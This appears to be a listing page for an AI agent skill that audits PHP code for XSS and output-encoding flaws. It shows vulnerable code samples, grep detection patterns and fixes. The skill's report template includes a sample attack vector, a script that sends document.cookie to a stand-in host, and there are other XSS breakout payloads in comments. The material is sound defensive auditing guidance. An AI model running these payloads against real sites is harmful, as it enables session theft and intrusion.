check-output-encoding
Analyzes PHP code for output encoding issues. Detects XSS vulnerabilities, missing HTML encoding, raw output, template injection risks.
Best use case
check-output-encoding is best used when you need a repeatable AI agent workflow instead of a one-off prompt.
Analyzes PHP code for output encoding issues. Detects XSS vulnerabilities, missing HTML encoding, raw output, template injection risks.
Teams using check-output-encoding should expect a more consistent output, faster repeated execution, less prompt rewriting.
When to use this skill
- You want a reusable workflow that can be run more than once with consistent structure.
When not to use this skill
- You only need a quick one-off answer and do not need a reusable workflow.
- You cannot install or maintain the underlying files, dependencies, or repository context.
Installation
Claude Code / Cursor / Codex
Manual Installation
- Download SKILL.md from GitHub
- Place it in
.claude/skills/check-output-encoding/SKILL.mdinside your project - Restart your AI agent — it will auto-discover the skill
How check-output-encoding Compares
| Feature / Agent | check-output-encoding | Standard Approach |
|---|---|---|
| Platform Support | Not specified | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | Unknown | N/A |
Frequently Asked Questions
What does this skill do?
Analyzes PHP code for output encoding issues. Detects XSS vulnerabilities, missing HTML encoding, raw output, template injection risks.
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
SKILL.md Source
# Output Encoding Security Check
Analyze PHP code for XSS and output encoding vulnerabilities.
## Detection Patterns
### 1. Missing HTML Encoding
```php
// CRITICAL: Direct echo of user input
echo $_GET['name'];
echo $user->getBio();
// CRITICAL: In HTML attribute
<input value="<?= $value ?>">
<a href="<?= $url ?>">
// CRITICAL: In JavaScript context
<script>var name = "<?= $name ?>";</script>
```
### 2. Raw Template Output
```php
// CRITICAL: Blade raw output
{!! $userContent !!}
{!! $request->input('message') !!}
// CRITICAL: Twig raw filter
{{ content|raw }}
{% autoescape false %}{{ content }}{% endautoescape %}
// VULNERABLE: PHP in templates
<?php echo $title; ?>
```
### 3. URL Encoding Issues
```php
// VULNERABLE: JavaScript URL
$url = "javascript:" . $_GET['code'];
<a href="<?= $url ?>">Click</a>
// VULNERABLE: Data URL
<img src="data:image/svg+xml,<?= $content ?>">
// VULNERABLE: Missing URL encoding
<a href="/search?q=<?= $query ?>">
```
### 4. JSON/JavaScript Context
```php
// VULNERABLE: JSON in HTML
<script>
var config = <?= json_encode($userConfig) ?>;
</script>
// CRITICAL: String in JS without escaping
<script>
var name = "<?= $name ?>"; // XSS via ";</script><script>alert(1)
</script>
// CORRECT:
<script>
var config = <?= json_encode($config, JSON_HEX_TAG | JSON_HEX_AMP) ?>;
</script>
```
### 5. CSS Context Injection
```php
// VULNERABLE: User input in style
<div style="background: <?= $color ?>">
// VULNERABLE: CSS injection
<style>
.user { color: <?= $userColor ?>; }
</style>
// ATTACK: expression(alert(1)) in IE, url("javascript:")
```
### 6. Header Injection
```php
// VULNERABLE: CRLF injection
header("Location: " . $_GET['redirect']);
// VULNERABLE: In Set-Cookie
setcookie('session', $value); // If $value has newlines
// VULNERABLE: Email header
mail($to, "Subject: $subject", $body); // Subject from user
```
### 7. Content-Type Mismatch
```php
// VULNERABLE: JSON without proper content type
echo json_encode($data); // May be interpreted as HTML
// CORRECT:
header('Content-Type: application/json');
echo json_encode($data);
```
### 8. SVG/XML Injection
```php
// VULNERABLE: User input in SVG
$svg = "<svg><text><?= $name ?></text></svg>";
// VULNERABLE: XML injection
$xml = "<user><name>$name</name></user>";
// ATTACK: <![CDATA[<script>alert(1)</script>]]>
```
## Grep Patterns
```bash
# Direct echo of variables
Grep: "echo\s+\\\$_(GET|POST|REQUEST)" --glob "**/*.php"
Grep: 'echo\s+\$\w+\s*;' --glob "**/*.php"
# Blade raw output
Grep: "\{!!\s*\\\$" --glob "**/*.blade.php"
# Twig raw filter
Grep: "\|raw\s*\}" --glob "**/*.twig"
# JavaScript context
Grep: '<script[^>]*>.*\$\w+' --glob "**/*.php"
# In HTML attributes
Grep: '(href|src|value|style)=["'\''].*<\?=' --glob "**/*.php"
```
## Severity Classification
| Pattern | Severity |
|---------|----------|
| Direct echo of user input | 🔴 Critical |
| JavaScript context injection | 🔴 Critical |
| Raw template output | 🔴 Critical |
| Header injection | 🟠 Major |
| Missing JSON content-type | 🟡 Minor |
## Encoding Functions
### HTML Context
```php
// PHP
echo htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
// Blade (default)
{{ $value }}
// Twig (default)
{{ value }}
```
### URL Context
```php
<a href="/search?q=<?= urlencode($query) ?>">
<a href="<?= htmlspecialchars($url, ENT_QUOTES) ?>">
```
### JavaScript Context
```php
<script>
var data = <?= json_encode($data, JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP) ?>;
</script>
```
### CSS Context
```php
// Whitelist approach
$allowedColors = ['red', 'blue', 'green'];
$color = in_array($input, $allowedColors) ? $input : 'black';
```
## Output Format
```markdown
### XSS Vulnerability: [Description]
**Severity:** 🔴 Critical
**Location:** `file.php:line`
**CWE:** CWE-79 (Cross-site Scripting)
**Issue:**
User input is output without proper encoding.
**Attack Vector:**
Attacker can inject: `<script>document.location='https://evil.com/?c='+document.cookie</script>`
**Code:**
```php
// Vulnerable code
```
**Fix:**
```php
// With proper encoding
```
```
## When This Is Acceptable
- **API-only projects** — JSON APIs don't need HTML encoding; Content-Type: application/json prevents XSS
- **Internal admin tools** — Tools used only by authenticated admins with trusted input
- **Template engines** — Twig/Blade auto-escape by default; raw output requires explicit `|raw` or `{!! !!}`
### False Positive Indicators
- Response has `Content-Type: application/json` header
- Project has no HTML templates (pure API)
- Template engine auto-escaping is enabled (Twig default)Related Skills
explain-output-template
Output format templates for all 5 explanation modes — quick (compact), deep (full analysis with diagrams), onboarding (project guide), business (non-technical), qa (interactive Q&A).
create-health-check
Generates Health Check pattern for PHP 8.4. Creates application-level health endpoints with component checkers (Database, Redis, RabbitMQ), status aggregation, and RFC-compliant JSON response. Includes unit tests.
create-docker-healthcheck
Generates Docker health check scripts for PHP services. Creates PHP-FPM, Nginx, and custom endpoint health checks.
check-xxe
Analyzes PHP code for XML External Entity vulnerabilities. Detects unsafe XML parsers, missing entity protection, LIBXML flags issues, XSLT attacks.
check-version-consistency
Audits version consistency across project files. Checks composer.json, README, CHANGELOG, docs, and configuration files for version number synchronization.
check-type-juggling
Detects PHP type juggling vulnerabilities. Identifies loose comparison with user input, in_array without strict mode, switch statement type coercion, and hash comparison bypasses.
check-timeout-strategy
Audits timeout configuration across HTTP clients, database connections, queue consumers, cache operations, and external service calls. Detects missing or misconfigured timeouts.
check-test-quality
Analyzes PHP test code quality. Checks test structure, assertion quality, test isolation, naming conventions, AAA pattern adherence.
check-ssrf
Analyzes PHP code for SSRF vulnerabilities. Detects unvalidated URLs, internal network access, DNS rebinding, cloud metadata access, URL parsing bypass attempts.
check-sql-injection
Analyzes PHP code for SQL injection vulnerabilities. Detects query concatenation, ORM misuse, raw queries, dynamic identifiers, prepared statement bypasses.
check-serialization
Analyzes PHP code for serialization overhead. Detects inefficient JSON encoding, large object hydration, missing JsonSerializable, circular reference issues.
check-sensitive-data
Analyzes PHP code for sensitive data exposure. Detects plaintext secrets, exposed credentials, PII in logs, insecure storage, hardcoded keys.